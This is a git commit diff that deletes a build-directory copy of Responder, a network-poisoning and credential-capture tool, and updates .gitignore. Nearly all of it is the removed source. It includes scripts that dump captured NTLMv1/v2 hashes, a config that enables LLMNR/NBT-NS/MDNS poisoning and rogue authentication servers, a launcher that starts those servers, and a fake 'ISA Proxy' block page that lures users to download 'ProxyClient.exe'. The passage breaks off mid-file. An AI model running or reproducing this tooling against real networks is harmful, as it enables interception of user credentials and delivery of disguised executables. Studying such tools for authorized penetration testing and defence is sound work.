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stackviolator 2024-08-12 15:07:38 -04:00
commit 382b7aba17
52 changed files with 3 additions and 15601 deletions
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3
.gitignore vendored
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@ -9,3 +9,6 @@
# Generated certificates and keys
certs/*.crt
certs/*.key
build/*
responder.eg-info/*

55
build/lib/Responder/DumpHash.py
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#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlite3
def DumpHashToFile(outfile, data):
with open(outfile,"w") as dump:
dump.write(data)
def DbConnect():
cursor = sqlite3.connect("./Responder.db")
return cursor
def GetResponderCompleteNTLMv2Hash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
Output = ""
for row in res.fetchall():
if "$" in row[0]:
pass
else:
Output += '{0}'.format(row[0])+'\n'
return Output
def GetResponderCompleteNTLMv1Hash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
Output = ""
for row in res.fetchall():
if "$" in row[0]:
pass
else:
Output += '{0}'.format(row[0])+'\n'
return Output
cursor = DbConnect()
print("Dumping NTLMV2 hashes:")
v2 = GetResponderCompleteNTLMv2Hash(cursor)
DumpHashToFile("DumpNTLMv2.txt", v2)
print(v2)
print("\nDumping NTLMv1 hashes:")
v1 = GetResponderCompleteNTLMv1Hash(cursor)
DumpHashToFile("DumpNTLMv1.txt", v1)
print(v1)

127
build/lib/Responder/Report.py
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#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlite3
import os
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def DbConnect():
cursor = sqlite3.connect("./Responder.db")
return cursor
def FingerDbConnect():
cursor = sqlite3.connect("./tools/RunFinger.db")
return cursor
def GetResponderData(cursor):
res = cursor.execute("SELECT * FROM Responder")
for row in res.fetchall():
print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
def GetResponderUsernamesStatistic(cursor):
res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
for row in res.fetchall():
print(color('\n[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1))
def GetResponderUsernames(cursor):
res = cursor.execute("SELECT DISTINCT user FROM Responder")
for row in res.fetchall():
print('User account: {0}'.format(row[0]))
def GetResponderUsernamesWithDetails(cursor):
res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
for row in res.fetchall():
print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
def GetResponderCompleteHash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
for row in res.fetchall():
print('{0}'.format(row[0]))
def GetUniqueLookupsIP(cursor):
res = cursor.execute("SELECT Poisoner, SentToIp FROM Poisoned WHERE Poisoner in (SELECT DISTINCT UPPER(Poisoner) FROM Poisoned)")
for row in res.fetchall():
if 'fe80::' in row[1]:
pass
else:
print('Protocol: {0}, IP: {1}'.format(row[0], row[1]))
def GetUniqueLookups(cursor):
res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
for row in res.fetchall():
print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
def GetUniqueDHCP(cursor):
res = cursor.execute("SELECT * FROM DHCP WHERE MAC in (SELECT DISTINCT UPPER(MAC) FROM DHCP)")
for row in res.fetchall():
print('MAC: {0}, IP: {1}, RequestedIP: {2}'.format(row[1], row[2], row[3]))
def GetRunFinger(cursor):
res = cursor.execute("SELECT * FROM RunFinger WHERE Host in (SELECT DISTINCT Host FROM RunFinger)")
for row in res.fetchall():
print(("{},['{}', Os:'{}', Build:'{}', Domain:'{}', Bootime:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', SMB1:'{}', MSSQL:'{}']".format(row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11])))
def GetStatisticUniqueLookups(cursor):
res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
for row in res.fetchall():
print(color('\n[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1))
def SavePoisonersToDb(result):
for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
if not k in result:
result[k] = ''
def SaveToDb(result):
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
cursor = DbConnect()
print(color("[+] Generating report...\n", code = 3, modifier = 1))
print(color("[+] DHCP Query Poisoned:", code = 2, modifier = 1))
GetUniqueDHCP(cursor)
print(color("\n[+] Unique IP using legacy protocols:", code = 2, modifier = 1))
GetUniqueLookupsIP(cursor)
print(color("\n[+] Unique lookups ordered by IP:", code = 2, modifier = 1))
GetUniqueLookups(cursor)
GetStatisticUniqueLookups(cursor)
print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1))
GetResponderUsernames(cursor)
print(color("\n[+] Username details:", code = 2, modifier = 1))
GetResponderUsernamesWithDetails(cursor)
GetResponderUsernamesStatistic(cursor)
print (color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1))
cursor.close()
try:
cursor = FingerDbConnect()
GetRunFinger(cursor)
except:
pass
print('\n')

111
build/lib/Responder/Responder.conf
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[Responder Core]
; Poisoners to start
MDNS = On
LLMNR = On
NBTNS = On
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
MQTT = On
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = Random
; SQLite Database file
; Delete this file to re-capture previously captured hashes
Database = Responder.db
; Default log file
SessionLog = Responder-Session.log
; Poisoners log
PoisonersLog = Poisoners-Session.log
; Analyze mode log
AnalyzeLog = Analyzer-Session.log
; Dump Responder Config log:
ResponderConfigDump = Config-Responder.log
; Specific IP Addresses to respond to (default = All)
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
RespondTo =
; Specific NBT-NS/LLMNR names to respond to (default = All)
; Example: RespondTo = WPAD, DEV, PROD, SQLINT
;RespondToName = WPAD, DEV, PROD, SQLINT
RespondToName =
; Specific IP Addresses not to respond to (default = None)
; Hosts with IPv4 and IPv6 addresses must have both addresses included to prevent responding.
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
DontRespondTo =
; Specific NBT-NS/LLMNR names not to respond to (default = None)
; Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName = ISATAP
; If set to On, we will stop answering further requests from a host
; if a hash has been previously captured for this host.
AutoIgnoreAfterSuccess = Off
; If set to On, we will send ACCOUNT_DISABLED when the client tries
; to authenticate for the first time to try to get different credentials.
; This may break file serving and is useful only for hash capture
CaptureMultipleCredentials = On
; If set to On, we will write to file all hashes captured from the same host.
; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
; domain\popo, domain\zozo. Recommended value: On, capture everything.
CaptureMultipleHashFromSameHost = On
[HTTP Server]
; Set to On to always serve the custom EXE
Serve-Always = Off
; Set to On to replace any requested .exe with the custom EXE
Serve-Exe = Off
; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = Off
; Custom HTML to serve
HtmlFilename = files/AccessDenied.html
; Custom EXE File to serve
ExeFilename = ;files/filetoserve.exe
; Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe
; Custom WPAD Script
; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address.
WPADScript =
; HTML answer to inject in HTTP responses (before </body> tag).
; leave empty if you want to use the default one (redirect to SMB on your IP address).
HTMLToInject =
[HTTPS Server]
; Configure SSL Certificates to use
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

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build/lib/Responder/Responder.py
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#!/usr/bin/env python3
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import optparse
import ssl
try:
from SocketServer import TCPServer, UDPServer, ThreadingMixIn
except:
from socketserver import TCPServer, UDPServer, ThreadingMixIn
from threading import Thread
from Responder.utils import *
import struct
import Responder.settings as settings
banner()
parser = optparse.OptionParser(usage='python %prog -I eth0 -w -d\nor:\npython %prog -I eth0 -wd', version=settings.__version__, prog=sys.argv[0])
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
parser.add_option('-I','--interface', action="store", help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
parser.add_option('-6', "--externalip6", action="store", help="Poison all requests with another IPv6 address than Responder's one.", dest="ExternalIP6", metavar="2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed", default=None)
parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None)
parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
parser.add_option('-d', '--DHCP', action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
parser.add_option('-D', '--DHCP-DNS', action="store_true", help="This option will inject a DNS server in the DHCP response, otherwise a WPAD server will be added. Default: False", dest="DHCP_DNS", default=False)
parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective. Default: False", dest="ProxyAuth_On_Off", default=False)
parser.add_option('-Q','--quiet', action="store_true", help="Tell Responder to be quiet, disables a bunch of printing from the poisoners. Default: False", dest="Quiet", default=False)
parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None)
options, args = parser.parse_args()
if not os.geteuid() == 0:
print(color("[!] Responder must be run as root."))
sys.exit(-1)
elif options.OURIP == None and IsOsX() == True:
print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
parser.print_help()
exit(-1)
elif options.ProxyAuth_On_Off and options.WPAD_On_Off:
print("\n\033[1m\033[31mYou cannot use WPAD server and Proxy_Auth server at the same time, choose one of them.\033[0m\n")
exit(-1)
settings.init()
settings.Config.populate(options)
StartupMessage()
settings.Config.ExpandIPRanges()
#Create the DB, before we start Responder.
CreateResponderDb()
Have_IPv6 = settings.Config.IPv6
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
pass
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
pass
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
TCPServer.server_bind(self)
class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
pass
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
TCPServer.server_bind(self)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
def server_bind(self):
MADDR = "224.0.0.251"
MADDR6 = 'ff02::fb'
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
#IPV6:
if (sys.version_info > (3, 0)):
if Have_IPv6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
if Have_IPv6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
pass
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
def server_bind(self):
MADDR = '224.0.0.252'
MADDR6 = 'FF02:0:0:0:0:0:1:3'
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
#IPV6:
if Have_IPv6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
pass
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
ThreadingUDPServer.allow_reuse_address = 1
if Have_IPv6:
ThreadingUDPServer.address_family = socket.AF_INET6
ThreadingTCPServer.allow_reuse_address = 1
if Have_IPv6:
ThreadingTCPServer.address_family = socket.AF_INET6
ThreadingUDPMDNSServer.allow_reuse_address = 1
if Have_IPv6:
ThreadingUDPMDNSServer.address_family = socket.AF_INET6
ThreadingUDPLLMNRServer.allow_reuse_address = 1
if Have_IPv6:
ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
ThreadingTCPServerAuth.allow_reuse_address = 1
if Have_IPv6:
ThreadingTCPServerAuth.address_family = socket.AF_INET6
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
def serve_NBTNS_poisoner(host, port, handler):
serve_thread_udp_broadcast('', port, handler)
def serve_MDNS_poisoner(host, port, handler):
try:
server = ThreadingUDPMDNSServer(('', port), handler)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
def serve_LLMNR_poisoner(host, port, handler):
try:
server = ThreadingUDPLLMNRServer(('', port), handler)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
def serve_thread_udp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
else:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
def serve_thread_tcp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer(('', port), handler)
server.serve_forever()
else:
server = ThreadingTCPServer(('', port), handler)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
def serve_thread_tcp_auth(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServerAuth(('', port), handler)
server.serve_forever()
else:
server = ThreadingTCPServerAuth(('', port), handler)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
def serve_thread_SSL(host, port, handler):
try:
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(cert, key)
if OsInterfaceIsSupported():
server = ThreadingTCPServer(('', port), handler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server.serve_forever()
else:
server = ThreadingTCPServer(('', port), handler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server.serve_forever()
except:
print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.")
def main():
try:
if (sys.version_info < (3, 0)):
print(color('\n\n[-]', 3, 1) + " Still using python 2? :(")
print(color('\n[+]', 2, 1) + " Listening for events...\n")
threads = []
# Load (M)DNS, NBNS and LLMNR Poisoners
if settings.Config.LLMNR_On_Off:
from Responder.poisoners.LLMNR import LLMNR
threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
if settings.Config.NBTNS_On_Off:
from Responder.poisoners.NBTNS import NBTNS
threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
if settings.Config.MDNS_On_Off:
from Responder.poisoners.MDNS import MDNS
threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
#// Vintage Responder BOWSER module, now disabled by default.
#// Generate to much noise & easily detectable on the network when in analyze mode.
# Load Browser Listener
#from Responder.servers.Browser import Browser
#threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
if settings.Config.HTTP_On_Off:
from Responder.servers.HTTP import HTTP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,)))
if settings.Config.WinRM_On_Off:
from Responder.servers.WinRM import WinRM
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
if settings.Config.WinRM_On_Off:
from Responder.servers.WinRM import WinRM
threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))
if settings.Config.SSL_On_Off:
from Responder.servers.HTTP import HTTP
threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
if settings.Config.RDP_On_Off:
from Responder.servers.RDP import RDP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,)))
if settings.Config.DCERPC_On_Off:
from Responder.servers.RPC import RPCMap, RPCMapper
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,)))
if settings.Config.WPAD_On_Off:
from Responder.servers.HTTP_Proxy import HTTP_Proxy
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,)))
if settings.Config.ProxyAuth_On_Off:
from Responder.servers.Proxy_Auth import Proxy_Auth
threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
if settings.Config.SMB_On_Off:
if settings.Config.LM_On_Off:
from Responder.servers.SMB import SMB1LM
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,)))
else:
from Responder.servers.SMB import SMB1
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))
if settings.Config.Krb_On_Off:
from Responder.servers.Kerberos import KerbTCP, KerbUDP
threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,)))
if settings.Config.SQL_On_Off:
from Responder.servers.MSSQL import MSSQL, MSSQLBrowser
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,)))
threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,)))
if settings.Config.FTP_On_Off:
from Responder.servers.FTP import FTP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,)))
if settings.Config.POP_On_Off:
from Responder.servers.POP3 import POP3
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,)))
if settings.Config.LDAP_On_Off:
from Responder.servers.LDAP import LDAP, CLDAP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,)))
threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 636, LDAP,)))
threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,)))
if settings.Config.MQTT_On_Off:
from Responder.servers.MQTT import MQTT
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1883, MQTT,)))
if settings.Config.SMTP_On_Off:
from Responder.servers.SMTP import ESMTP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25, ESMTP,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,)))
if settings.Config.IMAP_On_Off:
from Responder.servers.IMAP import IMAP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,)))
if settings.Config.DNS_On_Off:
from Responder.servers.DNS import DNS, DNSTCP
threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,)))
if settings.Config.SNMP_On_Off:
from Responder.servers.SNMP import SNMP
threads.append(Thread(target=serve_thread_udp, args=('', 161, SNMP,)))
for thread in threads:
thread.daemon = True
thread.start()
if settings.Config.AnalyzeMode:
print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
if settings.Config.Quiet_Mode:
print(color('[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.', 3, 1))
if settings.Config.DHCP_On_Off:
from Responder.poisoners.DHCP import DHCP
DHCP(settings.Config.DHCP_DNS)
while True:
time.sleep(1)
except KeyboardInterrupt:
sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
if __name__ == '__main__':
main()

4
build/lib/Responder/certs/gen-self-signed-cert.sh
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@ -1,4 +0,0 @@
#!/bin/bash
CERT_PATH=$1
openssl genrsa -out "$CERT_PATH/certs/responder.key" 2048
openssl req -new -x509 -days 3650 -key "$CERT_PATH/certs/responder.key" -out "$CERT_PATH/certs/responder.crt" -subj "/"

31
build/lib/Responder/files/AccessDenied.html
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@ -1,31 +0,0 @@
<html>
<head>
<title>Website Blocked: ISA Proxy Server</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Proxy Server</b></div>
</center>
</body>
</html>

0
build/lib/Responder/logs/.gitignore vendored
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124
build/lib/Responder/odict.py
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@ -1,124 +0,0 @@
import sys
try:
from UserDict import DictMixin
except ImportError:
from collections import UserDict
try:
from collections import MutableMapping as DictMixin
except ImportError:
from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
